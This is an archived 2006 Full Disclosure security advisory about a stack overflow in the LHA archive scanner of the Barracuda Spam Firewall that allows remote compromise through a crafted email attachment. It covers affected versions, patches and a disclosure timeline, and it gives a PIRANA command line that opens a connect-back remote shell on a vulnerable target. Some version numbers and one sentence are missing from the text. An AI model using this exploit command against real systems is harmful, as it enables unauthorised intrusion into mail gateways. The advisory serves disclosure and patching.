Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Barracuda LHA archiver security bug leads to remote compromise
From: Jean-Sébastien Guay-Leroux <jean-sebastien () guay-leroux com>
Date: Mon, 03 Apr 2006 19:51:17 -0400

Topic:                  Barracuda LHA archiver security bug leads to
                        remote compromise

Announced:              2006-04-03
Product:                Barracuda Spam Firewall
Vendor:                 http://www.barracudanetworks.com/
Impact:                 Remote shell access
Affected product:       Barracuda with firmware < AND
                        spamdef < 3.0.10045
Credits:                Jean-Sébastien Guay-Leroux
CVE ID:                 CVE-2004-0234


The Barracuda Spam Firewall is an integrated hardware and software solution for
complete protection of your email server. It provides a powerful, easy to use,
and affordable solution to eliminating spam and virus from your organization by
providing the following protection:

 * Anti-spam
 * Anti-virus
 * Anti-spoofing
 * Anti-phishing
 * Anti-spyware (Attachments)
 * Denial of Service


When building a special LHA archive with long filenames in it, it is possible to
overflow a buffer on the stack used by the program and seize control of the

Since this component is used when scanning an incoming email, remote compromise
is possible by sending a simple email with the specially crafted LHA archive
attached to the Barracuda Spam Firewall.

You do NOT need to have remote administration access (on port 8000) for
successfull exploitation.

For further informations about the details of the bugs, you can consult OSVDB
#5753 and #5754 .


Gain shell access to the remote Barracuda Spam Firewall


Using the PIRANA framework, available at http://www.guay-leroux.com , it is
possible to test the Barracuda Spam Firewall against the LHA vulnerability.

By calling PIRANA the way it is described below, you will get a TCP connect back
shell on IP address and port 1234:

perl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l \
-p 1234 -z -c 1 -d 1


Barracuda Networks pushed an urgent critical patch in spamdef #3.0.10045,
available March 24th 2006.

They also published an official patch in firmware #, available April
3rd 2006.

It is recommended to update to firmware # .


Ulf Harnhammar who found the original LHA flaw.

Jean-Sébastien Guay-Leroux who conducted further research on the bug
and produced exploitation plugin for the PIRANA framework.




2006-03-02 : Disclosure of vulnerability to Barracuda Networks
2006-03-02 : Acknowledgement of the problem
2006-03-24 : Problem fixed
2006-04-03 : Advisory disclosed to public

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • Barracuda LHA archiver security bug leads to remote compromise Jean-Sébastien Guay-Leroux (Apr 03)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]